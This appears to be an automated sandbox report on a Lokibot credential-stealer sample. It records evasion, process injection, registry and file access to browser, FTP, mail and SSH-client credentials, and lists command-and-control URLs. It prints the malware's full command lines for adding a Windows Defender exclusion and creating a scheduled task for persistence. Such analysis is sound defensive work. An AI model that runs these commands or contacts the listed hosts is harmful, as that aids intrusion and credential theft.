Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR

Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 24B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 4570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 5E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 6E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 6FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 7FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 1310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 2C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 4C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 6470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 60F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 7470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 8470000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7160			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2568			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe TID: 2696	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe TID: 2696	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe TID: 4320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\gunzipped.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gunzipped.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, WiHDtnb.exe, 0000000C.00000002.2001497626.0000000000A48000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\gunzipped.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Code function: 12_2_0040317B mov eax, dword ptr fs:[00000030h]

12_2_0040317B

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Code function: 12_2_00402B7C GetProcessHeap,HeapAlloc,

12_2_00402B7C

Source: C:\Users\user\Desktop\gunzipped.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\gunzipped.exe	Memory written: C:\Users\user\Desktop\gunzipped.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory written: C:\Users\user\AppData\Roaming\WiHDtnb.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Users\user\Desktop\gunzipped.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Users\user\AppData\Roaming\WiHDtnb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 4080, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\gunzipped.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: PopPassword		12_2_0040D069
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: SmtpPassword		12_2_0040D069

Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gunzipped.exe	18%	ReversingLabs
gunzipped.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\WiHDtnb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\WiHDtnb.exe	18%	ReversingLabs
C:\Users\user\AppData\Roaming\WiHDtnb.exe	34%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://136.244.109.75/index.php/comments/feed/	0%	Virustotal		Browse
http://136.244.109.75/index.php/feed/	0%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://136.244.109.75/index.php/1748937	true		unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://136.244.109.75/index.php/feed/	gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://136.244.109.75/index.php/comments/feed/	gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, WiHDtnb.exe, 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	WiHDtnb.exe, WiHDtnb.exe, 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://136.244.109.75/index.php/wp-json/	gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://gmpg.org/xfn/11	gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.w.org/	gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
136.244.109.75	unknown	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1427123
Start date and time:	2024-04-17 03:16:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gunzipped.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/13@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 70 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
